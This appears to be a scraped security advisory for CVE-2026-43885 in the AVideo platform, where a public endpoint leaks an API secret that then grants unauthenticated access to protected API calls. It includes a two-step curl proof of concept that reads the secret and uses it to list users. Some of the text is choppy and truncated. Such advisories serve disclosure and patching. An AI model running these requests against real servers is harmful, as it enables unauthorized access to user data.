Summary An unauthenticated user can read APISecret from objects/plugins.json.php and use it to call protected API endpoints (e.g. users_list) without logging in. Details objects/plugins.json.php is public and still expo…
| CVE ID | CVE-2026-43885 |
| Vendor | composer |
| Affected Product | wwbn/avideo |
| Vulnerability Type | Vulnerability |
| CVSS Score | 7.5 (HIGH) |
| Actively Exploited | ❌ No known exploitation |
| Patch Status | See Vendor Advisory → |
| Reported By | CYBERDUDEBIVASH SENTINEL APEX Intelligence (via github_advisories) |
#
APISecret from objects/plugins.json.php and use it to call protected API endpoints (e.g. users_list) without logging in.objects/plugins.json.php is public and still exposes plugin object_data containing APISecret. That secret is accepted by plugin/API/get.json.php as authentication.APISecret): ``bash curl 'http:// /objects/plugins.json.php'` 2. Copy APISecret from response, then call API directly: `bash curl --get 'http:// /plugin/API/get.json.php' \ --data-urlencode 'APIName=users_list' \ --data-urlencode 'APISecret= ' \ --data-urlencode 'rowCount=3' \ --data-urlencode 'current=1' ``
Sigma rules, YARA signatures, IOC table, and SIEM queries for Splunk, Elastic, Sentinel, and Chronicle — deployable in 5 minutes.